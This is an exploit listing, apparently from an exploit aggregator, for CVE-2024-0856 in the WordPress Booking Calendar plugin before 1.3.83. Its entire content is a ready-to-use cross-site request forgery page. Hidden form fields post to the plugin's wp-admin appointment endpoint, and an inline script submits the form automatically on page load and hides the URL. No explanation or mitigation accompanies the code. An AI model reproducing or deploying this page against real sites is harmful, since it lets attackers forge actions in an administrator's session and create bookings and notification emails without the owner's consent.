Exploit for Booking Calendar < 1.3.83 - CSRF appointment scheduling CVE-2024-0856

## https://sploitus.com/exploit?id=WPEX-ID:EB383600-0CFF-4F24-8127-1FB118F0565A
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=cpabc_appointments.php&cal=1&addbk=1&r=0.1210213745316624" method="POST">
      <input type="hidden" name="cpabc_appointments_post" value="1" />
      <input type="hidden" name="cpabc_appointments_utime" value="GMT 5.75" />
      <input type="hidden" name="cpabc_item" value="1" />
      <input type="hidden" name="selDaycal1" value=";2024,1,18 16:00" />
      <input type="hidden" name="selMonthcal1" value=";2024,1,19 16:00;2024,1,20 16:00;2024,1,21 16:00;2024,1,22 16:00" />
      <input type="hidden" name="selYearcal1" value="" />
      <input type="hidden" name="selHourcal1" value="" />
      <input type="hidden" name="selMinutecal1" value="" />
      <input type="hidden" name="sendemails_admin" value="1" />
      <input type="hidden" name="freq" value="10" />
      <input type="hidden" name="bydaym" value="1" />
      <input type="hidden" name="end" value="on" />
      <input type="hidden" name="phone" value="91" />
      <input type="hidden" name="name" value="hacker" />
      <input type="hidden" name="email" value="hacker@1337mickey.com" />
      <input type="hidden" name="question" value="hackeone" />
      <input type="hidden" name="subbtn" value="Continue" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>